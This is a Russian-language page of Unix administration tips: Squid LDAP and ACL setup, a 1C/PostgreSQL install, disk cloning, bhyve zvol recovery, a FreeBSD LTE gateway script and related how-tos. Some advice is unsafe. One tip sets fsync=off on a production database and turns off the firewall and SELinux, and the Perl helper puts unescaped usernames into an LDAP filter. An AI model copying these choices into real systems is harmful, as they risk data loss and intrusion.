/usr/lib/squid/squid_ldap_group.pl -b "cn=group2,ou=group,dc=ldap,dc=local" -H ldaps://ldap.local external_acl_type type_ldap_group3 ttl=60 children=1 %LOGIN /usr/lib/squid/squid_ldap_group.pl -b "cn=group3,ou=group,dc=ldap,dc=local" -H ldaps://ldap.local # и сами ACL acl acl_group1 external type_ldap_group1 acl acl_group2 external type_ldap_group2 acl acl_group3 external type_ldap_group3 ВСЕ. Дальше с ними можно работать как с обычными ACL, начиная от простого http_access allow acl_group1 и заканчивая в вариантах пула и по времени. При изменении информации в группе LDAP, squid примет изменения только через время определенное в ttl, таким образом перезапускать его как -kreconfigure нет необходимости, что уже плюс! Да вот еще, сам скрипт /usr/lib/squid/squid_ldap_group.pl очень прост: #!/usr/bin/perl # # squid ldap group # mailto:afletdinov\@dc.baikal.ru # use Getopt::Long qw(:config no_ignore_case); use Net::LDAP; use strict; # const my $VERSION = '20051122'; # variables my $ldap; my $user; my $result; #my $pass; my $opt_groupdn = ''; my $opt_binddn = ''; my $opt_bindpasswd = ''; my $opt_secretfile = ''; my $opt_uri = ''; GetOptions( 'b=s' => \$opt_groupdn, 'D=s' => \$opt_binddn, 'w=s' => \$opt_bindpasswd, 'W=s' => \$opt_secretfile, 'H=s' => \$opt_uri ); # check: requires param &usage unless($opt_groupdn and $opt_uri); #connect $ldap = Net::LDAP->new($opt_uri) or die("connect $opt_uri failed!"); # bind if($opt_binddn){ # check: secretfile if($opt_secretfile){ open(FILE, "<$opt_secretfile") or die("error read $opt_secretfile"); $opt_bindpasswd = <FILE>; close(FILE); } $result = $ldap->bind($opt_binddn, password=>$opt_bindpasswd); # anonymous bind }else{ $result = $ldap->bind(); } $result->code and die($result->error); # use buffers off $| = 1; # BASIC while(<STDIN>){ chomp; # format: user password unless(/^(\S+)\s*(\S*)$/){ print "ERR\n"; next; } $user = $1; #$pass = $2; # check: valid group $result = $ldap->search(base=>$opt_groupdn, , filter=>"(memberUid=$user)"); # not found unless($result->count){ print "ERR\n"; next; } # auth: OK group: OK print "OK\n"; } exit; sub usage(){ print <<EOF; squid_ldap_group.pl version $VERSION Usage: squid_ldap_group.pl -b "cn=www-access,ou=group,dc=ldap,dc=local" -H ldaps://ldap.local -b GroupBaseDN (REQUIRED) -H LdapURI (REQUIRED) -D BindDN -w BindPasswd -W SecretFile EOF exit; }

Как запретить выкачивание .mp3 файлов через прокси-сервер Squid. [комментарии]

acl stop_files url_regex -i ftp \.exe \.mp3 \.vqf \.tar\.gz \.gz \.rpm \.zip \.rar \.avi \.mpeg \.mpe \.mpg \.qt \.ram \.rm \.iso \.raw \.wav \.mov acl stop_files rep_mime_type application audio video http_access deny stop_files

Как запретить работу через Squid пользователей с определенных MAC адресов. [комментарии]

Squid должен быть собран с ./configure --enable-arp-acl Далее в файле прописываем ACL'и формата: acl aclname arp mac_address Например: acl test1 arp 11:43:67:F5:65:23 http_access allow test1 http_access deny all

Как ограничить пропускную способность 128 Kbps на каждый IP ? [комментарии]

acl only128kusers src 192.168.1.0/255.255.192.0 acl all src 0.0.0.0/0.0.0.0 delay_pools 1 delay_class 1 3 delay_access 1 allow only128kusers delay_access 1 deny all delay_parameters 1 64000/64000 -1/-1 16000/64000

Как органичить общую пропускную способность Squid в 512 Kbps ? [обсудить]

При сборке не забыть configure --enable-delay-pools В файле конфигурации: acl all src 0.0.0.0/0.0.0.0 delay_pools 1 delay_class 1 1 delay_access 1 allow all delay_parameters 1 64000/64000 # 512 kbits == 64 kbytes per second

Как ограничить число соединений от одного пользователя в Squid и Oops [комментарии]

Для Squid прописать ACL вида: acl имя_acl'я maxconn ограничения_в_N_соединений Для Oops: per_ip_conn число_соединений;

Система

FreeBSD специфика

Сис. информация, оптимизация и тюнинг FreeBSD

Увеличение безопасности FreeBSD

Установка и апгрейд FreeBSD и приложений.

Linux специфика

Оптимизация и тюнинг в Linux

Увеличение безопасности Linux

Установка и работа с пакетами программ в Linux

OpenBSD

Solaris специфика

Syslog, ведение логов

Диски и файлы

CD-ROM, CD-R, AudioCD:

RAID массивы

Ramdisk, tmpfs

Диагностика и Восстановление после сбоя

Квоты

Монтирование

Резервное копирование

Файловые системы

Загрузка, однопользовательский режим

Кластерные технологии

Поддержка аппаратного обеспечения

Просмотр состояния и мониторинг системы

Установка и синхронизация времени

Опыт настройки связки PostgreSQL и 1С в Oracle Linux (доп. ссылка 1) Автор: alexpn [комментарии]

Потребовалось сделать сервер 1С для чего была выбрана связка OracleLinux 6.1 + 1C82 (8.2.14.519) + Postgres 9.0.4. Собрал следующее железо для тестов: MB: Asus P5 CPU : Intel(R) Pentium(R) D CPU 3.20GHz 2 ядра MEM : 8G HDD : 1x160G 7200 (старый нового не нашлось) hdparm -Tt /dev/sda /dev/sda: Timing cached reads: 2670 MB in 2.00 seconds = 1335.62 MB/sec Timing buffered disk reads: 220 MB in 3.00 seconds = 73.30 MB/sec При установке выделил под SWAP 10G, остальное под корень, получилось что-то вроде: /dev/sda1 * 1 18152 145803264 83 Linux /dev/sda2 18152 19458 10484736 82 Linux своп / Solaris ставил все без LVM, разбивка руками. Выбрал минимальную установку Прицепил RPM-репозитории: cd /etc/yum.repos.d touch public-yum-ol6.repo добавил в файл public-yum-ol6.repo: [ol6_ga_base] name=Oracle Linux 6 GA - $basearch - base baseurl=http://public-yum.oracle.com/repo/OracleLinux/OL6/0/base/$basearch/ gpgkey=http://public-yum.oracle.com/RPM-GPG-KEY-oracle-ol6 gpgcheck=1 enabled=1 [ol6_u1_base] name=Oracle Linux 6 U1 - $basearch - base baseurl=http://public-yum.oracle.com/repo/OracleLinux/OL6/1/base/$basearch/ gpgkey=http://public-yum.oracle.com/RPM-GPG-KEY-oracle-ol6 gpgcheck=1 enabled=1 затем все как обычно yum update итак что видим .... если верить описанию система очень быстрая, некоторые прогнозируют прирост аж 110 процентов. смотрим что есть по дефолту cat /etc/sysctl.conf # Kernel sysctl configuration file for Red Hat Linux # Controls IP packet forwarding net.ipv4.ip_forward = 0 # Controls source route verification net.ipv4.conf.default.rp_filter = 1 # Do not accept source routing net.ipv4.conf.default.accept_source_route = 0 # Controls the System Request debugging functionality of the kernel kernel.sysrq = 0 # Controls whether core dumps will append the PID to the core filename. # Useful for debugging multi-threaded applications. kernel.core_uses_pid = 1 # Controls the use of TCP syncookies net.ipv4.tcp_syncookies = 1 # Disable netfilter on bridges. net.bridge.bridge-nf-call-ip6tables = 0 net.bridge.bridge-nf-call-iptables = 0 net.bridge.bridge-nf-call-arptables = 0 # Controls the maximum size of a message, in bytes kernel.msgmnb = 65536 # Controls the default maxmimum size of a mesage queue kernel.msgmax = 65536 # Controls the maximum shared segment size, in bytes kernel.shmmax = 68719476736 # Controls the maximum number of shared memory segments, in pages kernel.shmall = 4294967296 vm.overcommit_memory=2 неплохо добавим на всякий случай kernel.panic=5 kernel.panic_on_oops=5 kernel.panic_on_io_nmi=5 kernel.panic_on_unrecovered_nmi=5 отключим все ненужное .... взламывать сервер некому, он будет сугубо локальным. chkconfig ip6tables off chkconfig iptables off chkconfig netfs off chkconfig postfix off chkconfig saslauthd off затем отключим SELinux, так как с ним не работает 1C. vi /etc/selinux/config SELINUX=disabled и reboot Приступим к настройке 1C и PostgreSQL. Прочитал статью http://www.alsigned.ru/?p=1129 про установку 1С 8.2 в связке с Postgresql 9.0. Сделал все как в статье, единственно подменил в конфигурации PostgreSQL 9.0.4 и патчи взял для версии 9.0.3 (http://v8.1c.ru/overview/postgres_patches_notes.htm). Краткое изложение процесса: Загружаем необходимые пакеты: yum install rpm-build gcc make glibc-devel bison flex python-devel tcl-devel readline-devel \ zlib-devel openssl-devel krb5-devel e2fsprogs-devel gettext pam-devel openldap-devel icu libicu libicu-devel Патчим PostgreSQL wget http://v8.1c.ru/overview/postgresql_patches/9-0-4/postgresql-9.0.4-1.1C.src.rpm rpm -i postgresql-9.0.4-1.1C.src.rpm В файле /usr/lib/rpm/macros в параметре %_default_patch_fuzz заменяем 0 на 2. В файле /root/rpmbuild/SOURCES/postgresql.init прописываем: PGENGINE=/usr/pgsql/bin PGDATA=/var/lib/pgsql/data PGLOG=/var/lib/pgsql/pgstartup.log В spec-файле /root/rpmbuild/SPECS/postgresql-9.0-4C.spec меняем postgresql-9.0 на postgresql, получится примерно так: 525 chkconfig --add postgresql 530 sbin/service postgresql condstop >/dev/null 2>&1 531 chkconfig --del postgresql 537 /sbin/service postgresql condrestart >/dev/null 2>&1 Собираем пакет с пропатченным PostgreSQL: rpmbuild -ba --define 'runselftest 0' /root/rpmbuild/SPECS/postgresql-9.0-4C.spec Устанавливаем пакет: rpm -i /root/rpmbuild/RPMS/x86_64/*.rpm Инициализируем БД: su postgres /usr/pgsql/bin/initdb -D /var/lib/pgsql/data --locale=ru_RU.UTF-8 Запускаем postgresql: service postgresql start Устанавливаем 1С: Указываем имя хоста в /etc/hosts (имя должно совпадать с именем HOSTNAME, указанным в файле /etc/sysconfig/network): 127.0.0.1 localhost 1csrv 1csrv.mydomain.local 192.168.1.1 1csrv 1csrv.mydomain.local Устанавливаем пакеты с 1С: rpm -i 1C_Enterprise82-common-8.2.13-205.x86_64.rpm 1C_Enterprise82-server-8.2.13-205.x86_64.rpm \ 1C_Enterprise82-ws-8.2.13-205.x86_64.rpm 1C_Enterprise82-common-nls-8.2.13-205.x86_64.rpm \ 1C_Enterprise82-server-nls-8.2.13-205.x86_64.rpm 1C_Enterprise82-ws-nls-8.2.13-205.x86_64.rpm далее активируем сервисы 1c и postgresql: chkconfig srv1cv82 on chkconfig postgresql on В .bash_profile правим "PGDATA=/var/lib/pgsql9/data" на "PGDATA=/var/lib/pgsql/data". Далее запустил 1С-клиента, создал базу TEST и запустил тест Гилева (gilev.ru) ...ждал минут 20 !!!! набрал 9.1 !!! балов явно мало для комфортной работы. Гилев рекомендует включить блокировки вручную .... что и делаем через конфигуратор снова тест ..... уже 14 баллов. Пробуем оптимизировать postgresql.conf: shared_buffers = 1024MB # min 128kB work_mem = 400MB # min 64kB maintenance_work_mem = 2048MB # min 1MB fsync = off # turns forced synchronization on or off wal_sync_method = fdatasync # the default is the first option commit_delay = 50 # range 0-100000, in microseconds commit_siblings = 7 # range 1-1000 cpu_tuple_cost = 0.001 # same scale as above cpu_index_tuple_cost = 0.0005 # same scale as above effective_cache_size = 4096MB далее /etc/init.d/postgresql restart /etc/init.d/srv1cv82 restart Следующее тестирование показало 20.4 баллов.... неплохой результат. Поставил две конфигурации кадрыКОРП + бухгалтерияКОПРП. В конфигураторе сменил блокировки на управляемый режим блокировок. Написал скрипт для чистки логов и бекапа БД и поместил его в cron: #!/bin/bash set +x /bin/rm -rf /backups/1c/*.log /bin/touch /backups/1c/1c8_bkp.log BKPDIR=/backups/1c TIME=`date +%d-%m-%Y_%H:%M:%S` # год,месяц,день,часы,минуты DATE_ARC=`date +%d%m%Y` LOG=/backups/1c/1c8_bkp.log dl() { $* >> $LOG 2>&1 } dl echo $TIME dl /etc/init.d/srv1cv82 stop dl /bin/sleep 10 /bin/find /backups/1c -type f -mtime +1 -print | /usr/bin/xargs /bin/rm -f /bin/find /var/lib/pgsql/data/pg_log/ -type f -mtime +1 -print | /usr/bin/xargs /bin/rm -f /usr/pgsql/bin/pg_dump -U postgres -Fc -Z9 -c -f /backups/1c/buh.$DATE_ARC.sql buh /usr/pgsql/bin/pg_dump -U postgres -Fc -Z9 -c -f /backups/1c/hrm.$DATE_ARC.sql hrm /usr/pgsql/bin/pg_dump -U postgres -Fc -Z9 -c -f /backups/1c/test.$DATE_ARC.sql test dl echo $TIME dl /etc/init.d/srv1cv82 start Вот пожалуй и все

Удаление zombie процессов в Solaris (доп. ссылка 1) [комментарии]

Нередко из-за отсутствия обработчика сигнала SIGCHLD в родительском процессе, после завершения дочерней программы, остаются "<defunct>" или zombie процессы. Zombie процессы не занимают системные ресурсы, кроме записи в таблице процессов, что может вызвать ее переполнение и как следствие блокировку запуска новых процессов, при большой интенсивности появления zombie. Zombie исчезают после завершения работы родительского процесса, но записи в таблице также можно очистить принудительным путем. Получаем список zombie процессов: ps -ecl |grep "Z" F S UID PID PPID CLS PRI ADDR SZ WCHAN TTY TIME CMD 0 Z 100 27841 27840 - 0 - 0 - ? 0:00 <defunct> "kill" и "kill -9" в случае zombie использовать бесполезно. В Solaris для эмуляции вызова wait() для чтения кода возврата из таблицы процессов существует утилита preap: preap 27841 27841: exited with status 0

Установка летнего (декретного) времени для оборудования Linksys (доп. ссылка 1) Автор: Romik [комментарии]

Daylight Saving Time Rule на закладке Regional у SPA9хх, PAP2 и пр. в России устанавливается в start=3/-1/5/02:0:0;end=10/-1/4/02:0:0;save=1 Time Zone GMT +03:00 (в Москве), и указываются работающие NTP сервера. Вышеприведенная строка прибавляет 1 час к времени с 02:00 последнего воскресенья марта, и перестает его добавлять в 02:00 в последнее воскресенье октября.

Восстановление потерянных из-за сбоя в браузере данных (доп. ссылка 1) Автор: sysadmin.online [комментарии]

Если набитые данные в форме случайно необратимо потеряны, например, в Opera или Firefox ошибочный клик может привести с загрузке нового URL в текущем окне с невозможностью возврата к предыдущему, можно попытаться их восстановить следующим образом. Находим PID процесса: ps aux | grep firefox-bin ps aux | grep opera Делаем дамп: gdb -p 2408 (gdb) gcore Ищем текст: strings core.* | less Если браузер рухнул, то данные можно попробовать найти в /dev/mem, например: dd if=/dev/mem of=./mem.dump strings ./mem.dump > mem.txt

Скрипт автозагрузки программы с помощью screen (FreeBSD) (доп. ссылка 1) Автор: denz [комментарии]

Скрипт запуска и остановки игрового сервера Call of Duty: United Offence 1.51 #!/bin/sh # Zapusk Call of Duty (Game server) GAMESDIR=/home/games/coduo export GAMESDIR cd $GAMESDIR case "$1" in start) /usr/local/bin/screen -dm ./coduo_lnxded +set fs_homepath $GAMESDIR \ +set scr_motd +exec coduo.cfg +exec awe.cfg echo "Starting Call of Duty:United Offence 1.51 Server" ;; stop) pid=$(ps -ax|grep coduo_lnxded|grep -v grep | awk '{print $1}') kill ${pid} > /dev/null 2>&1 ;; *) echo "Используй: `basename $0` { start | stop }" exit 64 ;; esac Запускается так: ./etotscript.sh start останавливается: ./etotscript.sh stop

mgetty и подвисание после прозвона голосом Автор: Vladimir V. Kamarzin [комментарии]

В очень многих howto по настройки dial-in рекомендуют в /etc/mgetty+sendfax/login.config прописывать строки /AutoPPP/ - a_ppp /usr/sbin/pppd auth -chap +pap login * - - /bin/login @ что есть не совсем правильно, если требуется только ppp (или emsi и т.д.), ибо при такой конфигурации любой дозвонившийся голосом может завесить dial-in. Если не класть трубку хотя бы минуту, то на той стороне mgetty успевает запустить /bin/login, и, естественно, на последующие звонки модем не отвечает. Не прописывать строчку строчку * - - /bin/login @ не является выходом - mgetty всё равно запускает /bin/login если не удалось распознать ppp. Проблему можно решить, заменив в конфиге /bin/login на /sbin/nologin: * - - /sbin/nologin @

Как сохранять все core файлы только в определенной директории [обсудить]

FreeBSD (%U.%N.%P=user.имя_процесса.pid, подробнее - man core): sysctl -w kern.corefile=/tmp/%U.%N.%P.core Linux (последние ядра): sysctl -w kernel.core_pattern=/tmp/%e.%p.core (строка не больше 64 байт) или через /proc/sys/kernel/core_pattern Максимальный размер core файла задается через: ulimit -c 100

Как завести нового пользователя в FreeBSD в автономном режиме ? (доп. ссылка 1) [обсудить]

Нужно использовать не команду adduser, а команду pw (man pw, pw useradd help). Например: pw useradd -n логин -c 'комментарий, фио' -d /home/логин -m -s /bin/true

Какие программы в FreeBSD занимаются переиндексацией системных баз [комментарии]

/bin/sh MAKEDEV all (dev_mkdb) /usr/bin/newaliases /usr/bin/cap_mkdb /etc/login.conf /usr/sbin/pwd_mkdb -p /etc/master.passwd

Как создать рабочий дубликат Linux или FreeBSD системы. [обсудить]

1. Монтируем новый жесткий диск. 2. Создаем разделы на новом диске с помощью fdisk (для freebsd /stand/sysintall или /usr/sbin/sysinstall). Создаем файловую систему. 3. Копируем файлы на новый диск (кроме каталога /mnt, не допускаем рекурсии !!!) find / -xdev | cpio -pdumv /mnt/new - на каждый раздел. или tar cf - /bin /usr /etc д.р.| tar xf - -C /mnt/new или cd /mnt/new; dump -0u -f - /директории| restore -r -f - или cp -Raxv / /mnt/new - на каждый раздел. или pax -r -w -p e / /mnt (говорят копирует гораздо быстрее чем dump/restore) или просто копируем в Midnight Commander'е (не рекомендуется). Лучший способ - dump/restore или rsync, иначе можно потерять расширенные атрибуты и ACL. 4. Редактируем /mnt/new/etc/fstab 5. Создаем с помощью /dev/MAKEDEV недостающие устройства (для нового типа диска). 6. mkdir /mnt/new/proc /mnt/new/mnt 7a. Только для Linux: правка /etc/lilo.conf и запуск lilo -r /mnt/new -b /dev/hdb При возникновении ошибки при загрузке: Было: boot=/dev/sda default=linux-up image=/boot/vmlinuz-up label=linux-up root=/dev/sda2 initrd=/boot/initrd-up.img Предположим, что дубликат размещен на /dev/sdb, тогда меняем boot=/dev/sda на boot=/dev/sdb и добавляем: disk=/dev/sdb bios=0x80 Выполняем lilo -r /mnt/new и не забываем убирать исправления из lilo.conf. 7b. Для freebsd загрузчик устанавливается после разбиения диска на разделы через sysintall. PS. Если диски одинаковые можно использовать dd if=/dev/hda of=/dev/hdb, если разделы одинаковые: dd if=/dev/hda1 of=/dev/hdb1

FreeBSD специфика

Сис. информация, оптимизация и тюнинг FreeBSD

Увеличение безопасности FreeBSD

Установка и апгрейд FreeBSD и приложений.

Подключение в BHyVe zvol-диска с другой машины Автор: КриоМух [комментарии]

Ситуация такова: Когда-то давно в 2019 году, обратилась знакомая бухгалтер, с проблемой, что вирусы зашифровали все её базы 1С, хранящиеся на личном сервере, который ей поднял и оформил для работы по RDP - её айтишник. Когда вирус всё пожрал, внезапно обнаружилось, что отсутствуют резервные копии, так как они хранились на том же WIN-сервере, и оказались также пожранными. Более того, в процессе разбирательств с этой машиной, выяснилось, что там 4 диска, 2 - HDD и 2 SSD - и при этом все они отдельными устройствами, без намёка на хоть какую-то реализацию зеркалирования. Айтишника этого она с позором выгнала (отказавшись с ним иметь дело) и обратилась ко мне. Понятно что не за восстановлением пожранного, а за организацией сервера, в работе и надёжности которого она бы могла быть уверена. Я как старый пользователь FreeBSD, конечно сразу ей сформировал предложение - эту её машину превратить в сервер на FreeBSD, а уже на нём развернуть виртуалку с виндой, 1С и всей этой нужной для её работы кухней. На предложение докупить ещё один ПК, чтобы был отдельной машиной для резервных копий - отказалась, так как женщина она во-первых бухгалтер, а во-вторых прижимистый бухгалтер :) Всё ей в итоге оформил в виде хоста на FreeBSD, c её ZFS-ным зеркалом на 2 HDD и 2 SSD, и самбой, на которую складировались ежедневные бэкапы, которые затем скриптом самого хоста перекладывались в samba-ресурс, доступный только на чтение. Виртуалку оформил на BHyVe'е, так как виртуалбокс медленнен, а BHyVe и православный и производительней. Sparse - файлом оформил диск на HDD-пуле под систему в виртуалке, и SSD-пул - подключил zvol'ом как диск под базы 1С. Разворачивал BHyVe не голый, а с управлением с помощью vm-bhyve. Всё завелось и работало, как часы. Но через год-полтора, женщина-бухгалтер и со мной "рассталась", так как всё работало, а я за поддержку желал ежемесячную, оговорённую сумму. Никаких козней я понятное дело не строил, да и не собирался, так как честь IT-шную беречь должно всегда. И все актуальные копии хранилища со всеми доступами и чего там наворочено в её "инфраструктуре" я ей при внесении правок сразу высылал и при завершении сотрудничества также актуальную выдал, с пояснениями, что там всё что есть, все доступы и прочая-прочая, что может понадобиться знать любому, кто будет заниматься её сервером. Ответы на все вопросы так сказать. Всё. Собственно прошло 3-4 года, и вот недавно звонит она мне и говорит, что всё пропало. Сервак не грузится, её текущий админ не знает что со всем этим делать, так как с его слов "там сложная распределённая система и диски эти не может посмотреть". Короче сервак подох, ничего не работает, и ей главное выцарапать оттуда 1С базы. Получил, включил, смотрю: Действительно ничего не грузится, что-то там с uefi разделом, и загрузка дохнет на начальных этапах. Думаю - ничего страшного, там же бэкапы были, сейчас быстренько смонтирую пул, да последний достану и дело с концом. Загрузился с флешки, подмонтировал пул, который был HDD, под самбу - смотрю а бэкап последний лежит прошлогодний. Место на пуле закончилось, так как самбу они ещё и как файловую шару использовали и накидали туда всякого, что подъело весь ресурс и баз видимо 1С ещё добавилось, и бэкапы делаться просто не смогли, а текущий специалист, то ли не следил, то ли не знал как следить, короче перефразируя (надеюсь) из тех, кто: "Не следил и не проверял бэкапы, но теперь уже будет всегда это делать (ещё раз надеюсь)". Тогда остался один путь - получить данные непосредственно с диска в виртуалке, который реализован был как отдельный датасет на SSD пуле. Отцепил я значит один из SSD'шников и подключил к своему домашнему ПК, на котором у меня также FreeBSD и виртуалка BHyVe, с виндой, на случай если что-то виндовое потребуется. В общем вся соль этого была в подключении к BHyVe'овой машине диска оформленного как сырой ZFS-датасет. То есть в нём ни файлов нет, просто особого типа ZFS датасет. В итоге, чтобы его подключить на посторонней системе с FreeBSD, надо конечно первым делом ZFS-пул импортировать: zpool import -f -f нужен, так как он ругнётся что этот пул использовался на другой машине и вроде как может не надо его тут подключать. А после этого в zfs list ищем где наш датасет и объявляем его в конфигурации нашей рабочей виртуалки: disk1_type="virtio-blk" disk1_dev="custom" disk1_name="/dev/zvol/oldSSD/BHYVE/1C-BASES" И это тут так всё просто и безоблачно описано, а на деле я часа два наверное бодался с тем, как именно объявить zvol-овый диск в BHyVe. И в итоге
disk_type - должен быть virtio-blk
disk_dev - должен быть custom
disk_name - абсолютный путь к zvol'у в /dev, сперва это можно просто проверить ls'ом. Ну а дальше - ещё в самой загруженной ОСи диск не увиделся, но появился SCSI контроллер какой-то, который потребовал драйвера с диска virtio-win-0.1.229 и всё. Женщина - оплатила услуги непростого восстановления файлов, получила инструктаж на тему того, что её админ должен ей подтверждать что бэкап есть и он надёжен. Ну а она со своей стороны должна за этим бдить :)

Быстрый посмотр конфигурации GEOM во FreeBSD (доп. ссылка 1) Автор: Mikhail Zakharov [комментарии]

Диски, разделы, метки, gmirror и всё прочее: sysctl -n kern.geom.conftxt или sysctl -n kern.geom.confxml Простой скрипт парсинга конфигурации GEOM: https://github.com/mezantrop/geom_show Например: ./geom_show.sh -l -c DISK -s ";" Class;Provider;Mediasize;Sectorsize;Stripesize;Stripeoffset;Heads;Sectors;RPM;Ident;Description DISK;ada1;52428800;512;0;0;16;63;unknown;VBef22e825-34dd5784;VBOX HARDDISK DISK;ada0;25769803776;512;0;0;16;63;unknown;VB05968cbc-2007b6c8;VBOX HARDDISK DISK;cd0;0;2048;0;0;0;0;unknown;;VBOX CD-ROM DISK;da1;740294656;512;0;0;64;32;unknown;;VBOX HARDDISK DISK;da0;62914560;512;0;0;64;32;unknown;;VBOX HARDDISK sysctl -n kern.geom.confxml | ./geom_show.awk -v class=PART -v ofs=" " Class Provider Mediasize Sectorsize Stripesize Stripeoffset Start End Index Type PART ada0p3 1073700352 512 0 3221245952 48234536 50331606 3 freebsd-swap PART ada0p2 24695537664 512 0 544768 1064 48234535 2 freebsd-ufs PART ada0p1 524288 512 0 20480 40 1063 1 freebsd-boot

Установка параметров шлюза на базе FreeBSD по динамическому адресу Автор: als [комментарии]

Введение На сервере FreeBSD 10.1 установлены два интернет канала. Первый вполне нормальный Ethernet, выделенный ip адрес. Второй - LTE модем, адрес соответственно динамический. Весь трафик squid должен уходить на второй канал. Для этого используется опция tcp_outgoing в squid.conf В правилах ipfw добавлены два правила для обеспечения forward на новый шлюз ipfw add 10 fwd <адрес шлюза на втором канале> all from <динамический адрес второго канала> to not 192.168.1.0/24 out ipfw add 11 pass all from any to <динамический адрес второго канала> via <интерфейс LTE модема> in Механизм ясен. Осталось сделать следующее: 1. При изменении динамического адреса надо подставлять новые значения в ipfw и в squid 2. Сделать это при старте сервера По тексту интерфейс ue0 - интерфейс LTE модема. Получение нового динамического адреса После инициализации модема и запуска dhclient мы получим динамический IP адрес. dhclient формирует leases в своем файле. Пример файла: lease { interface "ue0"; fixed-address 100.67.50.124; option subnet-mask 255.255.255.248; option routers 100.67.50.121; option domain-name-servers 83.149.32.225,83.149.32.224; option dhcp-lease-time 518400; option dhcp-message-type 5; option dhcp-server-identifier 100.67.50.121; option dhcp-renewal-time 259200; option dhcp-rebinding-time 453600; renew 1 2015/6/15 08:59:05; rebind 3 2015/6/17 14:59:05; expire 4 2015/6/18 08:59:05; } lease { interface "ue0"; fixed-address 100.67.3.43; option subnet-mask 255.255.255.248; option routers 100.67.3.41; option domain-name-servers 83.149.32.225,83.149.32.224; option dhcp-lease-time 518400; option dhcp-message-type 5; option dhcp-server-identifier 100.67.3.41; option dhcp-renewal-time 259200; option dhcp-rebinding-time 453600; renew 6 2015/6/13 16:12:27; rebind 1 2015/6/15 22:12:27; expire 2 2015/6/16 16:12:27; } Lease в текущий момент будет последним. Нас интересует две строки. fixed-address - это сам динамический адрес. option routers - это адрес шлюза на этом интерфейсе. Я получаю эти поля через awk, только потому, что lease несколько и нам нужен последний. Через awk это удобно сделать. Скрипт для получения ip megafon_get_ip.awk: BEGIN {nline=1 } { tag1[nline]=$1 tag2[nline]=$2 nline=nline+1 } END { for (u=1;u<nline;u++) { if (tag1[u]=="fixed-address") { # Делаем замену последнего символа, что бы не мешал. gsub(";","",tag2[u]); ip = tag2[u]; } } print ip; } Скрипт для получения routers megafon_get_router.awk: BEGIN {nline=1 } { tag2[nline]=$2 tag3[nline]=$3 nline=nline+1 } END { for (u=1;u<nline;u++) { if (tag2[u]=="routers") { # Делаем замену последнего символа, что бы не мешал. gsub(";","",tag3[u]); router = tag3[u]; } } print router; } Обновление таблиц ipfw Считывание нового динамического адреса и адреса шлюза в ipfw сделано через cat Выдержка из rc.firewall: ... eth_megafon="ue0" ip_megafon=`cat /etc/megafon_ip` router_megafon=`cat /etc/megafon_router` ${fwcmd} add 10 fwd $router_megafon all from $ip_megafon to not 192.168.0.0/16 out ${fwcmd} add 11 pass all from any to $ip_megafon via $eth_megafon in ... Как видно, текущие адреса хранятся в /etc/megafon_ip и /etc/megafon_router Обновление squid.conf К сожалению, опция tcp_outgoing_address требует указания адреса. То есть фокус как в rc.firewall не пройдет. Значит надо будет делать замену. Создаем файл squid.conf.etalon: ... tcp_outgoing_address #ip_megafon# ... И остается применить sed 's/#ip_megafon#/'< новый динамический адрес >'/g' /usr/local/etc/squid/squid.conf.etalon > /usr/local/etc/squid/squid.conf Основной скрипт Итак, получать новые адреса научились. Обновлять в ipfw, менять squid.conf тоже. Полученные новые адреса пишем во временные файлы, потом сравниваем новый динамический адрес с прежним. Прежний (текущий) адрес храним в файл /etc/megafon. Если адреса не совпадают, обновляем файл с адресом и запускаем механизм обновления megafon_get_ip: #Получаем новый ip awk -f /usr/local/scripts/megafon_get_ip.awk /var/db/dhclient.leases.ue0 > /tmp/megafon_ip #Получаем новый router. Хотя можно и позже, но для удобства понимания можно и тут awk -f /usr/local/scripts/megafon_get_router.awk /var/db/dhclient.leases.ue0 > /tmp/megafon_router #Сравниваем его с существующим ip_new=`cat /tmp/megafon_ip` ip_now=`cat /etc/megafon_ip` if [ $ip_new != $ip_now ]; then # Обновляем файлы. Нужно обновлять и таблицы ipfw cp /tmp/megafon_ip /etc/megafon_ip cp /tmp/megafon_router /etc/megafon_router #Обновляем ipfw. Эта конструкция не отрубает соединение при обновлении правил ipfw sh /etc/rc.firewall > /dev/null 2>&1 #Формируем новый конфиг squid. К сожалению, tcp_outgoing не умеет брать адрес из файла. sed 's/#ip_megafon#/'$ip_new'/g' /usr/local/etc/squid/squid.conf.etalon > /usr/local/etc/squid/squid.conf #Рестарт squid. /usr/local/sbin/squid -k reconfigure fi Запуск основного скрипта при старте сервера Для получения динамического адреса самым простым виделось поставить в rc.conf строку ifconfig_ue0="DHCP" Но модем от Мегафона, его надо инициализировать перед запросом адреса. Заодно обеспечим вызов основного скрипта. Создал /usr/local/etc/rc.d/megafon megafon: #!/bin/sh # # PROVIDE: megafon # REQUIRE: dhclient # KEYWORD: shutdown . /etc/rc.subr name=megafon load_rc_config ${name} command=/usr/local/etc/megafon command_args="" run_rc_command "$1" В rc.conf добавляем: ... megafon="YES" ... Сам стартовый скрипт /usr/local/etc/megafon: #Инициализация модема echo 'AT^NDISDUP=1,1,"internet"' > /dev/cuaU1 #Стартуем клиента /sbin/dhclient -b ue0 #Через 10 секунд надо вызвать обновление таблиц и всего остального. Приводит к 10 секундной задержке старта сервера. sleep 10 #Вызов основного скрипта /usr/local/scripts/megafon_get_ip Периодическое обновление Механизма вызова сторонних скриптов при обновлении динамического адреса не нашел. Если поставить основной скрипт в cron с периодом запуска 1 минута, то при обновлении адреса время потери составит связи не больше 1 минуты.

Организация входа по SSH в окружение Live-диска FreeBSD (доп. ссылка 1) [комментарии]

В процессе восстановления сбойного сервера гораздо удобнее проводить восстановительные работы с привычной рабочей станции, соединившись по SSH. При этом не всегда имеется возможность загрузить сбойную систему и обеспечить её доступ к сети, что вынуждает пользоваться Live-окружением в процессе восстановления. Ниже представлена инструкция, как запустить SSH-сервер в окружении FreeBSD Live CD. Загрузившись в Live-CD запускаем командную оболочку через кнопку Shell. Поднимаем и настраиваем сетевой интерфейс: dhclient em0 или при статическом назначении IP: ifconfig em0 inet 1.2.3.4 netmask 255.255.255.0 Перемонтируем раздел /etc для обеспечения записи данных, создав доступный на запись слой поверх оригинальной read-only основы при помощи UnionFS: mkdir /tmp/etc mount_unionfs /tmp/etc /etc Правим конфигурацию sshd, например, разрешим вход от пользователя root: vi /etc/ssh/sshd_config Установим пароль для пользователя root: passwd root Запустим sshd (скрипт автоматически сгенерирует все нужные для хоста ключи): service sshd onestart Подключаемся с другой машины по SSH и выполняем восстановительные работы.

Создание отказоустойчивого хранилища на базе FreeBSD или FreeNAS с использованием ZFS, HAST и CARP (доп. ссылка 1) [комментарии]

